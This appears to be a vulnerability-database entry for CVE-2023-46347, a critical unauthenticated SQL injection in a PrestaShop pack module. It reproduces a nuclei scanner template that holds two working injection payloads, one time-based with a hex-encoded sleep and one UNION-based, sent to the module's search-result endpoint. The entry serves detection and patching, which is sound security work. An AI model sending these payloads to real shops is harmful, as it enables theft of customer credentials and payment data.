PrestaShop Step by Step products Pack - SQL Injection

02 Jul 2026 09:36:57 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

PrestaShop Step by Step products Pack - SQL Injection, critical severity, NDK Design module, CVE-2023-46347

Related

| Reporter | Title | Published | Family |
| --- | --- | --- | --- |
| ATTACKERKB | CVE-2023-46347 | 25 Oct 2023 18:17 | attackerkb |
| Circl | CVE-2023-46347 | 27 Mar 2025 00:00 | circl |
| CNNVD | PrestaShop SQL Injection Vulnerability | 25 Oct 2023 00:00 | cnnvd |
| CVE | CVE-2023-46347 | 25 Oct 2023 00:00 | cve |
| Cvelist | CVE-2023-46347 | 25 Oct 2023 00:00 | cvelist |
| NVD | CVE-2023-46347 | 25 Oct 2023 18:17 | nvd |
| OSV | CVE-2023-46347 | 25 Oct 2023 18:17 | osv |
| Prion | Sql injection | 25 Oct 2023 18:17 | prion |
| Positive Technologies | PT-2023-29968 · Unknown · Ndk Steppingpack | 24 Oct 2023 00:00 | ptsecurity |
| RedhatCVE | CVE-2023-46347 | 23 May 2025 03:57 | redhatcve |

id: CVE-2023-46347

info:
  name: PrestaShop Step by Step products Pack - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
    In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries, potentially extracting sensitive database information including user credentials and payment data.
  remediation: |
    Update the Step by Step products Pack (ndk_steppingpack) module to version 1.5.7 or later from NDK Design.
  reference:
    - https://security.friendsofpresta.org/modules/2023/10/24/ndk_steppingpack.html
    - https://stack.chaitin.com/poc/detail/3977
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-46347
    cwe-id: CWE-89
    epss-score: 0.49885
    epss-percentile: 0.98758
    cpe: cpe:2.3:a:ndkdesign:ndk_steppingpack:*:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ndkdesign
    product: ndk_steppingpack
    framework: prestashop
    shodan-query: http.component:"prestashop"
  tags: time-based-sqli,cve,cve2023,sqli,prestashop,ndk_steppingpack,ndkdesign,vkev,vuln

variables:
  num: "999999999"

http:
  - raw:
      - |
        @timeout: 15s
        POST /modules/ndk_steppingpack/search-result.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--

      - |
        @timeout: 15s
        POST /modules/ndk_steppingpack/search-result.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        search_query=1")+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL,NULL,NULL--+-

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        name: Time Based
        dsl:
          - 'status_code_1 != 404'
          - 'duration_1>=6'
          - 'contains(content_type_1, "text/html")'
          - 'contains_any(tolower(response_1), "prestashop", "xipblog")'
        condition: and

      - type: word
        name: union-based
        part: body_2
        words:
          - '{{md5({{num}})}}'
# digest: 4b0a00483046022100e0f903d6157c0d9ace7c32d5e7e74e80bda201ec1d035092d2fb81d99ba58bbd022100a06c505d2f9d59d05f12ab4e944d1caece386b92efb8268e5fa2cca2e970200f:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (current)
Vulners AI Score: 7.3 (High risk)
CVSS 3.1: 9.8
EPSS: 0.49885